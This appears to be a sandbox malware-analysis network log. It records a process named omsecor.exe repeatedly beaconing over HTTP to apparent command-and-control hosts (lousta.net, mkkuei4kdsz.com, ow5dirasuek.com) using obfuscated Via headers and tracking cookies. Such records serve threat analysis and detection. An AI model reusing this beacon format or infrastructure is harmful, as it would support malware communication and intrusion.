                                                                                                                                                                                                Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.449731193.166.255.171806792C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:03:56.655287981 CET186OUTGET /740/238.html HTTP/1.1
                                                                                                                                                                                                From: 133749470339604713
                                                                                                                                                                                                Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.44973215.197.204.56806792C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:04:05.250096083 CET191OUTGET /516/243.html HTTP/1.1
                                                                                                                                                                                                From: 133749470339604713
                                                                                                                                                                                                Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67
                                                                                                                                                                                                Host: mkkuei4kdsz.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Nov 1, 2024 16:04:05.884797096 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:04:05 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 114
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                3192.168.2.44973352.34.198.229806792C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:04:06.351166964 CET191OUTGET /546/102.html HTTP/1.1
                                                                                                                                                                                                From: 133749470339604713
                                                                                                                                                                                                Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67
                                                                                                                                                                                                Host: ow5dirasuek.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Nov 1, 2024 16:04:07.185451984 CET419INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:04:07 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473447|1730473447|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                4192.168.2.449734193.166.255.171806524C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:04:07.439101934 CET186OUTGET /497/157.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                5192.168.2.449741193.166.255.171806524C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:04:16.034172058 CET186OUTGET /527/338.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                6192.168.2.44974215.197.204.56806524C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:04:24.661830902 CET191OUTGET /457/998.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56
                                                                                                                                                                                                Host: mkkuei4kdsz.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Nov 1, 2024 16:04:25.293509960 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:04:25 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 114
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                Nov 1, 2024 16:04:43.785203934 CET191OUTGET /781/119.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56
                                                                                                                                                                                                Host: mkkuei4kdsz.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Nov 1, 2024 16:04:43.943324089 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:04:43 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 114
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                7192.168.2.44974352.34.198.229806524C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:04:25.409394979 CET302OUTGET /434/722.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56
                                                                                                                                                                                                Host: ow5dirasuek.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Cookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473447|1730473447|0|1|0
                                                                                                                                                                                                Nov 1, 2024 16:04:26.234617949 CET339INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:04:26 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473466|1730473447|9|2|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                8192.168.2.449744193.166.255.171806524C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:04:26.361087084 CET185OUTGET /78/665.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                9192.168.2.449745193.166.255.171806524C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:04:34.968975067 CET186OUTGET /956/959.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                10192.168.2.44974752.34.198.229806524C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:04:44.062597036 CET302OUTGET /945/466.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56
                                                                                                                                                                                                Host: ow5dirasuek.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Cookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473466|1730473447|9|2|0
                                                                                                                                                                                                Nov 1, 2024 16:04:44.887509108 CET340INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:04:44 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473484|1730473447|13|3|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                11192.168.2.449748193.166.255.17180764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:04:45.128473997 CET161OUTGET /547/467.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                12192.168.2.449798193.166.255.17180764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:04:53.735132933 CET161OUTGET /528/262.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                13192.168.2.44983815.197.204.5680764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:02.340269089 CET166OUTGET /353/421.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93
                                                                                                                                                                                                Host: mkkuei4kdsz.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Nov 1, 2024 16:05:03.027405024 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:05:02 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 114
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                14192.168.2.44984452.34.198.22980764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:03.143146038 CET278OUTGET /537/167.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93
                                                                                                                                                                                                Host: ow5dirasuek.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Cookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473484|1730473447|13|3|0
                                                                                                                                                                                                Nov 1, 2024 16:05:03.976630926 CET340INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:05:03 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473503|1730473447|16|4|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                15192.168.2.449851193.166.255.17180764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:04.203615904 CET169OUTGET /508/485.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                16192.168.2.449899193.166.255.17180764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:12.797590971 CET169OUTGET /333/645.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                17192.168.2.44994515.197.204.5680764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:21.393177986 CET174OUTGET /978/939.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot
                                                                                                                                                                                                Host: mkkuei4kdsz.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Nov 1, 2024 16:05:22.052130938 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:05:21 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 114
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                18192.168.2.44995152.34.198.22980764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:22.173016071 CET286OUTGET /292/164.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot
                                                                                                                                                                                                Host: ow5dirasuek.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Cookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473503|1730473447|16|4|0
                                                                                                                                                                                                Nov 1, 2024 16:05:23.012407064 CET340INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:05:22 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473522|1730473447|17|5|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                19192.168.2.449958193.166.255.17180764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:23.238634109 CET169OUTGET /263/482.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                20192.168.2.450008193.166.255.17180764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:31.846018076 CET169OUTGET /908/776.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                21192.168.2.45002315.197.204.5680764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:40.454207897 CET173OUTGET /785/70.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot
                                                                                                                                                                                                Host: mkkuei4kdsz.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Nov 1, 2024 16:05:41.083230019 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:05:41 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 114
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                22192.168.2.45002452.34.198.22980764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:41.215163946 CET286OUTGET /763/794.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot
                                                                                                                                                                                                Host: ow5dirasuek.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Cookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473522|1730473447|17|5|0
                                                                                                                                                                                                Nov 1, 2024 16:05:42.038714886 CET340INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:05:41 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473541|1730473447|18|6|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                23192.168.2.450025193.166.255.17180764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:42.266555071 CET169OUTGET /734/112.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                24192.168.2.450026193.166.255.17180764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:50.861746073 CET169OUTGET /562/252.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot
                                                                                                                                                                                                Host: lousta.net
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                25192.168.2.45002715.197.204.5680764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:05:59.523369074 CET174OUTGET /488/933.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot
                                                                                                                                                                                                Host: mkkuei4kdsz.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Nov 1, 2024 16:06:00.210562944 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:06:00 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 114
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                26192.168.2.45002852.34.198.22980764C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:06:00.351746082 CET286OUTGET /776/947.html HTTP/1.1
                                                                                                                                                                                                From: 133749470461635988
                                                                                                                                                                                                Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot
                                                                                                                                                                                                Host: ow5dirasuek.com
                                                                                                                                                                                                Connection: Keep-Alive
